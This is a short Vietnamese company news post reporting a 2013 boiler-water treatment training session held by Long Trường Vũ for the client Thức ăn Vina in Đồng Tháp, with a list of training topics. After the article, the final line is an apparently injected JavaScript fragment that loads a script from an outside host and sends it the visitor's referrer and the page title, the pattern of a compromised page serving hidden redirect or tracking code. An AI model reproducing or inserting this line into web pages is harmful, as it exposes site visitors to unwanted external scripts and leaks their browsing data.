Mon,21-05-2018

THỨC ĂN VINA - 15.03.2013

Ngày 15.03.2013 Công ty Long Trường Vũ đã thực hiện thành công buổi training về kỹ thuật xử lý nước lò hơi tại Khách hàng Thức ăn Vina - Đồng Tháp.

 

Lý thuyết các vấn đề thường gặp và giải pháp

 

Phương pháp kiểm soát

 

Các điểm kiểm soát

 

Hướng dãn vận hành hệ thống làm mềm

 

Hướng dẫn vận hành đầu điều khiển

 

Kiểm tra cuối khoá đào tạo

s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';